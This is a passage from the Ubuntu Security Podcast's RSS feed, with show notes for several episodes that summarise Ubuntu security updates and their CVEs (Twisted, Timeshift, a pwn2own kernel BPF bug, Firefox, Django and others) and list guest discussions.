  disclosed during pwn2own, Timeshift, pam-krb5 and more, plus we have a
  special guest, Vineetha Kamath, to discuss security certifications for
  Ubuntu.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover security updates for a Linux kernel vulnerability
  disclosed during pwn2own, Timeshift, pam-krb5 and more, plus we have a
  special guest, Vineetha Kamath, to discuss security certifications for
  Ubuntu.
  </itunes:summary>
        <description>  This week we cover security updates for a Linux kernel vulnerability
  disclosed during pwn2own, Timeshift, pam-krb5 and more, plus we have a
  special guest, Vineetha Kamath, to discuss security certifications for
  Ubuntu.
  </description>
        <googleplay:description>  This week we cover security updates for a Linux kernel vulnerability
  disclosed during pwn2own, Timeshift, pam-krb5 and more, plus we have a
  special guest, Vineetha Kamath, to discuss security certifications for
  Ubuntu.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover security updates for a Linux kernel vulnerability
disclosed during pwn2own, Timeshift, pam-krb5 and more, plus we have a
special guest, Vineetha Kamath, to discuss security certifications for
Ubuntu.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>10 unique CVEs addressed</p>
<h3 id="usn-4308-2-twisted-vulnerabilities-00-42">[<a href="https://usn.ubuntu.com/4308-2/">USN-4308-2</a>] Twisted vulnerabilities [00:42]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10109">CVE-2020-10109</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10108">CVE-2020-10108</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12855">CVE-2019-12855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12387">CVE-2019-12387</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-68/">Episode 68</a> - 4 of the 7 CVEs described there affect Twisted in 14.04
ESM</li>
</ul>
<h3 id="usn-4310-1-webkitgtk-plus-vulnerability-01-09">[<a href="https://usn.ubuntu.com/4310-1/">USN-4310-1</a>] WebKitGTK+ vulnerability [01:09]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10018">CVE-2020-10018</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF - discovered by CloudFuzz</li>
</ul>
<h3 id="usn-4312-1-timeshift-vulnerability-01-49">[<a href="https://usn.ubuntu.com/4312-1/">USN-4312-1</a>] Timeshift vulnerability [01:49]</h3>
<ul>
<li>1 CVEs addressed in Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10174">CVE-2020-10174</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Reuses predictably named temporary directory to execute scripts - and
runs as root - so a local attacker could replace the script in this
predictably named directory with one containing malicious commands, to
get code execution as root. Fixed by using a randomly named directory
<strong>and</strong> setting the permissions on it so other users can&rsquo;t write to it.</li>
</ul>
<h3 id="usn-4313-1-linux-kernel-vulnerability-02-43">[<a href="https://usn.ubuntu.com/4313-1/">USN-4313-1</a>] Linux kernel vulnerability [02:43]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8835">CVE-2020-8835</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>pwn2own - Manfred Paul discovered the BPF verifier in the Linux kernel
did not properly calculate register bounds for 32-bit operations - so if
allow unprivileged users to load BPF, this could be used to read or write
kernel memory. Can then use this to elevate privileges to root.</li>
<li><a href="https://www.thezdi.com/blog/2020/3/19/pwn2own-2020-day-one-results">https://www.thezdi.com/blog/2020/3/19/pwn2own-2020-day-one-results</a></li>
</ul>
<h3 id="usn-4311-1-bluez-vulnerabilities-03-52">[<a href="https://usn.ubuntu.com/4311-1/">USN-4311-1</a>] BlueZ vulnerabilities [03:52]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-7837">CVE-2016-7837</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0556">CVE-2020-0556</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Didn&rsquo;t handle bonding of HID and HOGP (HID over GATT - Generic Attribute
Profile) devices - local attacker could use this to impersonate
non-bonded devices</li>
<li>Buffer overflow in parse_line function used by some CLI-based userland
utils</li>
</ul>
<h3 id="usn-4314-1-pam-krb5-vulnerability-04-50">[<a href="https://usn.ubuntu.com/4314-1/">USN-4314-1</a>] pam-krb5 vulnerability [04:50]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10595">CVE-2020-10595</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Single-byte buffer overflow could potentially allow RCE - buffer is
provided by underlying kerberos library - attacker can supply input of
special length to overflow this and then cause memory corruption -
possible heap or stack corruption. Only used in code-paths where Kerberos
lib does supplemental prompting, or if running PAM with no_prompt
configured.</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-vineetha-discuss-security-certifications-for-ubuntu-06-14">Joe and Vineetha discuss security certifications for Ubuntu [06:14]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E069.mp3" length="19586521" type="audio/mpeg" /><itunes:duration>20:24</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 68
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-68/</link>
          <pubDate>Thu, 26 Mar 2020 13:57:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>752981b197f4eaf0db4708b94d9ac79fa9aa156b054327af10cdd189024f6a0c1904b4b04f29ef7651e09135867e5b460294a84be9dc9c793bfc1155c8e0683a</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 68</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover security updates for Apache, Twisted, Vim a kernel
  livepatch and more, plus Alex and Joe discuss OVAL data feeds and the
  cvescan snap for vulnerability awareness.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover security updates for Apache, Twisted, Vim a kernel
  livepatch and more, plus Alex and Joe discuss OVAL data feeds and the
  cvescan snap for vulnerability awareness.
  </itunes:summary>
        <description>  This week we cover security updates for Apache, Twisted, Vim a kernel
  livepatch and more, plus Alex and Joe discuss OVAL data feeds and the
  cvescan snap for vulnerability awareness.
  </description>
        <googleplay:description>  This week we cover security updates for Apache, Twisted, Vim a kernel
  livepatch and more, plus Alex and Joe discuss OVAL data feeds and the
  cvescan snap for vulnerability awareness.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover security updates for Apache, Twisted, Vim a kernel
livepatch and more, plus Alex and Joe discuss OVAL data feeds and the
cvescan snap for vulnerability awareness.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>16 unique CVEs addressed</p>
<h3 id="usn-4307-1-apache-http-server-update-00-24">[<a href="https://usn.ubuntu.com/4307-1/">USN-4307-1</a>] Apache HTTP Server update [00:24]</h3>
<ul>
<li>TLSv1.3 enabled in Ubuntu 18.04 LTS (bionic)
<ul>
<li>Enabled by default, could cause compatibility issues in some
environments - can be disabled using the SSLProtocol directive</li>
<li><a href="https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/1845263">https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/1845263</a></li>
</ul>
</li>
</ul>
<h3 id="lsn-0064-1-linux-kernel-vulnerability-01-03">[LSN-0064-1] Linux kernel vulnerability [01:03]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-2732">CVE-2020-2732</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>KVM nested virtualisation issue (L2 guest could access resources of L1
parent) - <a href="https://ubuntusecuritypodcast.org/episode-67/">Episode 67</a></li>
</ul>
<h3 id="usn-4308-1-twisted-vulnerabilities-02-07">[<a href="https://usn.ubuntu.com/4308-1/">USN-4308-1</a>] Twisted vulnerabilities [02:07]</h3>
<ul>
<li>7 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10109">CVE-2020-10109</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10108">CVE-2020-10108</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9515">CVE-2019-9515</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9514">CVE-2019-9514</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9512">CVE-2019-9512</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12855">CVE-2019-12855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12387">CVE-2019-12387</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 variations of a HTTP request splitting / smuggling vuln (<a href="https://ubuntusecuritypodcast.org/episode-52/">Episode 52</a>)</li>
<li>3 HTTP/2 DoS issues (<a href="https://ubuntusecuritypodcast.org/episode-43/">Episode 43</a>)</li>
<li>MITM of XMPP TLS connections due to failure to verify certs</li>
<li>Failure to sanitize URIs or HTTP methods in twisted.web</li>
</ul>
<h3 id="usn-4309-1-vim-vulnerabilities-03-53">[<a href="https://usn.ubuntu.com/4309-1/">USN-4309-1</a>] Vim vulnerabilities [03:53]</h3>
<ul>
<li>7 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-11109">CVE-2017-11109</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6350">CVE-2017-6350</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6349">CVE-2017-6349</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20079">CVE-2019-20079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20786">CVE-2018-20786</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-5953">CVE-2017-5953</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All low / negligible since requires a user to use vim to source a crafted
file (ie a list of commands / settings for vim) or crafted undo /
spelling dictionary etc</li>
<li>Integer overflows -&gt; heap overflows -&gt; DoS / RCE etc</li>
</ul>
<h3 id="usn-4134-3-ibus-vulnerability-04-49">[<a href="https://usn.ubuntu.com/4134-3/">USN-4134-3</a>] IBus vulnerability [04:49]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14822">CVE-2019-14822</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-47/">Episode 47</a> - implements it&rsquo;s own private DBus server which clients
connect to - original vuln allowed any user who knew address of this bus
to connect to it - update fixed this by checking the connecting user was
the same as the owning user - but caused a regression in Qt clients -
would fail to be able to properly connect to ibus - was reverted - this
has seen been fixed by fixing the GDBusServer implementation in libglib2
since it was actually incorrect - and so now we have re-fixed in ibus</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-discuss-ubuntu-security-oval-feeds-and-cvescan-06-47">Alex and Joe discuss Ubuntu Security OVAL feeds and cvescan [06:47]</h3>
<ul>
<li><a href="https://people.canonical.com/~ubuntu-security/oval/">https://people.canonical.com/~ubuntu-security/oval/</a></li>
<li><a href="https://snapcraft.io/cvescan">https://snapcraft.io/cvescan</a></li>
</ul>
<h3 id="securing-open-source-through-cve-prioritisation-15-56">Securing open source through CVE prioritisation [15:56]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/securing-open-source-through-cve-prioritisation">https://ubuntu.com/blog/securing-open-source-through-cve-prioritisation</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E068.mp3" length="16670420" type="audio/mpeg" /><itunes:duration>17:21</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 67
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-67/</link>
          <pubDate>Thu, 19 Mar 2020 20:25:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>bfa68a8055be84e37f33b58058b37a06d58a906c34914c4d20cdf859da1359902bbd1b65f5c2ad56be4388ccef2b53856af22e8294b60148db4f92ce55864061</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 67</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          A big week in security updates, including the Linux kernel, Ceph, ICU,
  Firefox, Dino and more, plus Joe and Alex discuss tips for securely working
  from home in light of Coronavirus.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  A big week in security updates, including the Linux kernel, Ceph, ICU,
  Firefox, Dino and more, plus Joe and Alex discuss tips for securely working
  from home in light of Coronavirus.
  </itunes:summary>
        <description>  A big week in security updates, including the Linux kernel, Ceph, ICU,
  Firefox, Dino and more, plus Joe and Alex discuss tips for securely working
  from home in light of Coronavirus.
  </description>
        <googleplay:description>  A big week in security updates, including the Linux kernel, Ceph, ICU,
  Firefox, Dino and more, plus Joe and Alex discuss tips for securely working
  from home in light of Coronavirus.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>A big week in security updates, including the Linux kernel, Ceph, ICU,
Firefox, Dino and more, plus Joe and Alex discuss tips for securely working
from home in light of Coronavirus.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>38 unique CVEs addressed</p>
<h3 id="usn-4299-1-firefox-vulnerabilities-00-41">[<a href="https://usn.ubuntu.com/4299-1/">USN-4299-1</a>] Firefox vulnerabilities [00:41]</h3>
<ul>
<li>12 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-6811">CVE-2020-6811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6809">CVE-2020-6809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6815">CVE-2020-6815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6814">CVE-2020-6814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6813">CVE-2020-6813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6812">CVE-2020-6812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6810">CVE-2020-6810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6808">CVE-2020-6808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6807">CVE-2020-6807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6806">CVE-2020-6806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6805">CVE-2020-6805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20503">CVE-2019-20503</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>74.0 - usual sorts of fixes:
<ul>
<li>Crafted website -&gt; DoS, URL and other browser chrome spoofing, bypass
content security policy protections, RCE etc</li>
<li>Extensions with all-url permission could access local files</li>
<li>Copy-as-cURL devtools feature failed to escape website-controlled
data - possible command injection -&gt; RCE if user tricked into using
this on a crafted website</li>
</ul>
</li>
</ul>
<h3 id="usn-4300-1-linux-kernel-vulnerabilities-02-02">[<a href="https://usn.ubuntu.com/4300-1/">USN-4300-1</a>] Linux kernel vulnerabilities [02:02]</h3>
<ul>
<li>11 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19068">CVE-2019-19068</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19066">CVE-2019-19066</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19064">CVE-2019-19064</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19059">CVE-2019-19059</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19058">CVE-2019-19058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19056">CVE-2019-19056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19053">CVE-2019-19053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19043">CVE-2019-19043</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18809">CVE-2019-18809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2732">CVE-2020-2732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3016">CVE-2019-3016</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3 eoan, bionic hwe</li>
<li>2 KVM issues
<ul>
<li>Nested KVM guest could access resources of parent -&gt; sensitive info
disclosure</li>
<li>Guest VM could read memory from another guest VM since would sometimes
miss deferred TLB flushes when switching guests</li>
</ul>
</li>
<li>Rest low priority
<ul>
<li>Memory leaks in various network and other device drivers under
particular error scenarios - not likely that a local or remote user
could easily trigger these so hence low priority</li>
</ul>
</li>
</ul>
<h3 id="usn-4301-1-linux-kernel-vulnerabilities-03-53">[<a href="https://usn.ubuntu.com/4301-1/">USN-4301-1</a>] Linux kernel vulnerabilities [03:53]</h3>
<ul>
<li>8 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19068">CVE-2019-19068</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19066">CVE-2019-19066</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19059">CVE-2019-19059</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19058">CVE-2019-19058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19056">CVE-2019-19056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19053">CVE-2019-19053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2732">CVE-2020-2732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3016">CVE-2019-3016</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.0 &ldquo;cloud&rdquo; specific kernel (oracle, aws, gke, gcp etc)</li>
<li>Same issues as above just with a couple less of the driver memory leak
fixes since these were already done in a previous update</li>
</ul>
<h3 id="usn-4302-1-linux-kernel-vulnerabilities-04-31">[<a href="https://usn.ubuntu.com/4302-1/">USN-4302-1</a>] Linux kernel vulnerabilities [04:31]</h3>
<ul>
<li>10 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15217">CVE-2019-15217</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19068">CVE-2019-19068</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19066">CVE-2019-19066</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19058">CVE-2019-19058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19056">CVE-2019-19056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19051">CVE-2019-19051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19046">CVE-2019-19046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8832">CVE-2020-8832</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14615">CVE-2019-14615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2732">CVE-2020-2732</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15, bionic and xenial hwe</li>
<li>CVE-2020-8832 - Ubuntu Intel i915 specific issue due to previous fix for
CVE-2020-14615 being incomplete - so not completely mitigated in this
kernel as expected</li>
<li>KVM nested virt bug and various driver memory leak fixes (see above) and
a NULL pointer deref if a malicious USB device was inserted to the system</li>
</ul>
<h3 id="usn-4303-1-usn-4303-2-linux-kernel-vulnerability-05-26">[<a href="https://usn.ubuntu.com/4303-1/">USN-4303-1</a>, <a href="https://usn.ubuntu.com/4303-2/">USN-4303-2</a>] Linux kernel vulnerability [05:26]</h3>
<ul>
<li>1 CVEs addressed in Xenial and Trusty ESM (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-2732">CVE-2020-2732</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Nested KVM virt issue</li>
</ul>
<h3 id="usn-4304-1-ceph-vulnerability-05-48">[<a href="https://usn.ubuntu.com/4304-1/">USN-4304-1</a>] Ceph vulnerability [05:48]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1700">CVE-2020-1700</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS able to be triggered by an authenticated user causing an unexpected
disconnect to radosgw - sockets pile up and eventually exhaust resources
-&gt; DoS</li>
</ul>
<h3 id="usn-4305-1-icu-vulnerability-06-26">[<a href="https://usn.ubuntu.com/4305-1/">USN-4305-1</a>] ICU vulnerability [06:26]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10531">CVE-2020-10531</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>C/C++ library for unicode handling - integer overflow -&gt; heap buffer
overflow - DoS/RCE?</li>
</ul>
<h3 id="usn-4306-1-dino-vulnerabilities-07-05">[<a href="https://usn.ubuntu.com/4306-1/">USN-4306-1</a>] Dino vulnerabilities [07:05]</h3>
<ul>
<li>3 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16237">CVE-2019-16237</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16236">CVE-2019-16236</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16235">CVE-2019-16235</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Thanks to Julian Andres Klode from Foundations</li>
<li>Fixes for multiple failures to validate inputs - remote attacker could
use to obtain, inject or remove info</li>
<li>Also includes a change to accept IV of 12 bytes as well as 16 bytes since
this is what a lo t of other OMEMO clients are using
<ul>
<li>OMEMO (OMEMO Multi-End Message and Object Encryption) - XMPP extension
for multiclient E2E - so allows messages to be synchronised across
multiple clients, even if some are offline</li>
</ul>
</li>
</ul>
<h3 id="usn-4171-5-apport-regression-08-14">[<a href="https://usn.ubuntu.com/4171-5/">USN-4171-5</a>] Apport regression [08:14]</h3>
<ul>
<li>5 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15790">CVE-2019-15790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11485">CVE-2019-11485</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11483">CVE-2019-11483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11482">CVE-2019-11482</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11481">CVE-2019-11481</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Thanks to Tiago Daitx and Michael Hudson-Doyle from Foundations Team</li>
<li>Previous security update broke some autopkgtests and broke python2
compatibility for various parts of Apport</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-securely-working-from-home-whilst-avoiding-coronavirus-09-21">Joe and Alex discuss securely working from home whilst avoiding Coronavirus [09:21]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E067.mp3" length="23280026" type="audio/mpeg" /><itunes:duration>24:14</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 66
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-66/</link>
          <pubDate>Thu, 12 Mar 2020 22:39:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>d1e8818a626f92b9f17bcc02ff8dae1abe27d82cfeeef01ad1ea3da9a39462474d0852264deee569dcecea72ae42aae4588e6964a69dff5d88114878b5153547</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 66</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover security updates for Django, runC and SQLite, plus Alex
  and Joe discuss the AMD speculative execution Take A Way attack and we
  look at some recent blog posts by the team too.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover security updates for Django, runC and SQLite, plus Alex
  and Joe discuss the AMD speculative execution Take A Way attack and we
  look at some recent blog posts by the team too.
  </itunes:summary>
        <description>  This week we cover security updates for Django, runC and SQLite, plus Alex
  and Joe discuss the AMD speculative execution Take A Way attack and we
  look at some recent blog posts by the team too.
  </description>
        <googleplay:description>  This week we cover security updates for Django, runC and SQLite, plus Alex
  and Joe discuss the AMD speculative execution Take A Way attack and we
  look at some recent blog posts by the team too.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover security updates for Django, runC and SQLite, plus Alex
and Joe discuss the AMD speculative execution Take A Way attack and we
look at some recent blog posts by the team too.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>16 unique CVEs addressed</p>
<h3 id="usn-4296-1-django-vulnerability-00-49">[<a href="https://usn.ubuntu.com/4296-1/">USN-4296-1</a>] Django vulnerability [00:49]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9402">CVE-2020-9402</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible SQL injection in the GIS functions when using an Oracle DB as
the backend - Oracle provides a tolerance parameter which can be used
when doing GIS queries and this was not properly sanitised before use so
could allow SQL injection</li>
</ul>
<h3 id="usn-4297-1-runc-vulnerabilities-01-30">[<a href="https://usn.ubuntu.com/4297-1/">USN-4297-1</a>] runC vulnerabilities [01:30]</h3>
<ul>
<li>2 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19921">CVE-2019-19921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16884">CVE-2019-16884</a> <!-- raw HTML omitted --></li>
</ul>
